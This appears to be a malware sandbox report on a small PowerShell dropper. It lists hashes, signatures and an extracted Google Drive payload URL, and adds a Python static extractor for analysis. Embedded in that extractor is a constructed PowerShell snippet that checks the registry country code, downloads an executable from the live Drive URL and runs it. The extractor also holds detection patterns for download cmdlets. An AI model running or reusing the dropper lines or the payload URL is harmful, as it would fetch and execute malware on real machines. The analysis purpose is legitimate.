General

  • Target

    ea037f858b767baef3eb6c9eff455c83_JaffaCakes118

  • Size

    3KB

  • Sample

    240918-1f6hsavcpr

  • MD5

    ea037f858b767baef3eb6c9eff455c83

  • SHA1

    1b91f976a4458c8c315fae6b731eb80b615fd3a3

  • SHA256

    7e614a8b38ce81dc274032850bdc9e6cc41b80d6c0eaddcf5b1989add198a96b

  • SHA512

    012b033aff2a3a35d54f0be5b32b1ea7b5599cff09d9ba7a25be4f20ca697a81618d68defee97ef5dd4cf31a966802a8637a570e4e050a97441d3c622211b3dd

Score
10/10

Malware Config

Extracted

  Language      ps1
  Deobfuscated  yes
  URLs
    exe.dropper   https://drive.google.com/uc?export=download&id=17arYmcfomWk-aZSZP9P1qjMl442HppCm

Targets

    • Target

      ea037f858b767baef3eb6c9eff455c83_JaffaCakes118 (3KB; MD5, SHA1, SHA256 and SHA512 as listed under General)

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Legitimate hosting services abused for malware hosting/C2
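
As an added example (not code from the sandbox, the sample, or this page), a small static extractor in Python that reproduces the findings above from a deobfuscated .ps1: it pulls URLs, tags the Google Drive direct-download link as exe.dropper and keeps the Drive file id as a pivot, and flags the registry country-code lookup that the "Checks computer location settings" signature refers to. The PowerShell text embedded in the block is constructed to mimic those behaviours and is not the sample's contents; only the URL is taken from the extracted config on this page. The LEGIT_HOSTING list, the GeoID comparison value and the exe.dropper heuristic are assumptions.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed, illustrative PowerShell text for this example. It is NOT the
# sample described on this page; it only mimics the behaviours the report flags
# (a Google Drive direct-download URL and a registry lookup of the configured
# country code). The URL itself is the one listed in the report's extracted config.
SAMPLE_PS1 = r'''
$geo = (Get-ItemProperty -Path "HKCU:\Control Panel\International\Geo").Nation
if ($geo -eq "244") { exit }   # 244 is the GeoID for the United States
$u = "https://drive.google.com/uc?export=download&id=17arYmcfomWk-aZSZP9P1qjMl442HppCm"
$o = "$env:TEMP\svc.exe"
(New-Object Net.WebClient).DownloadFile($u, $o)
Start-Process $o
'''

# Hosts commonly abused as free file storage for payloads (illustrative list, an assumption).
LEGIT_HOSTING = {
    "drive.google.com", "docs.google.com", "dropbox.com",
    "dl.dropboxusercontent.com", "onedrive.live.com", "1drv.ms",
    "raw.githubusercontent.com", "github.com", "pastebin.com",
}

URL_RE = re.compile(r"https?://[^\s\"'<>);]+")
# PowerShell / .NET download primitives a dropper typically feeds the URL into.
DOWNLOAD_SINK_RE = re.compile(
    r"\b(DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|iwr|"
    r"Invoke-RestMethod|irm|Start-BitsTransfer|curl|wget)\b", re.I)
EXE_TARGET_RE = re.compile(r"\.exe\b", re.I)

# Registry paths and cmdlets that reveal the machine's configured country or locale.
GEO_PATTERNS = {
    "registry Control Panel\\International\\Geo (Nation/Name)":
        re.compile(r"Control Panel\\International\\Geo", re.I),
    "registry SYSTEM\\...\\Control\\Nls\\Language":
        re.compile(r"Control\\Nls\\Language", re.I),
    "cmdlet Get-WinHomeLocation":
        re.compile(r"Get-WinHomeLocation", re.I),
    "cmdlet Get-Culture / Get-WinSystemLocale":
        re.compile(r"Get-(Culture|WinSystemLocale)", re.I),
}


def extract_urls(script: str) -> list[str]:
    """Return every http(s) URL in the script, in order, without duplicates."""
    seen: list[str] = []
    for m in URL_RE.finditer(script):
        if m.group(0) not in seen:
            seen.append(m.group(0))
    return seen


def classify_url(url: str, script: str) -> dict:
    """Tag a URL the way a config extractor would: where it is hosted, whether the
    script hands it to a download primitive, and whether the payload lands as .exe.
    The sink/target check is script-wide (a heuristic, an assumption)."""
    parsed = urlparse(url)
    host = parsed.netloc.lower()
    has_sink = DOWNLOAD_SINK_RE.search(script) is not None
    drops_exe = EXE_TARGET_RE.search(script) is not None
    if has_sink and drops_exe:
        kind = "exe.dropper"
    elif has_sink:
        kind = "download"
    else:
        kind = "reference"
    info = {"url": url, "host": host, "type": kind,
            "legit_hosting": host in LEGIT_HOSTING}
    # Google Drive's direct-download form carries the file id in the query string;
    # that id is a stable pivot even when the wrapper script is re-obfuscated.
    if host == "drive.google.com":
        info["drive_id"] = parse_qs(parsed.query).get("id", [None])[0]
    return info


def geofence_checks(script: str) -> list[str]:
    """Name every location/locale lookup present in the script."""
    return [name for name, rx in GEO_PATTERNS.items() if rx.search(script)]


def analyze(script: str) -> dict:
    """Produce a config-style summary: URLs with types, geofence lookups, and the
    signatures that a static view of the script can support."""
    urls = [classify_url(u, script) for u in extract_urls(script)]
    geo = geofence_checks(script)
    signatures = []
    if any(u["legit_hosting"] for u in urls):
        signatures.append("Legitimate hosting services abused for malware hosting/C2")
    if geo:
        signatures.append("Checks computer location settings")
    return {"language": "ps1", "urls": urls, "geofence": geo, "signatures": signatures}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_PS1), indent=2))
```

The "Blocklisted process makes network request" signature is deliberately not reproduced here: it is a dynamic observation (powershell.exe opening a socket) that a static pass over the script cannot confirm. In a real pipeline the sink check would follow the variable holding the URL rather than scanning the whole script, and the Drive file id would be the indicator to pivot on, since the wrapper is trivially re-obfuscated while the hosted payload id is not.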

MITRE ATT&CK Enterprise v15

Tasks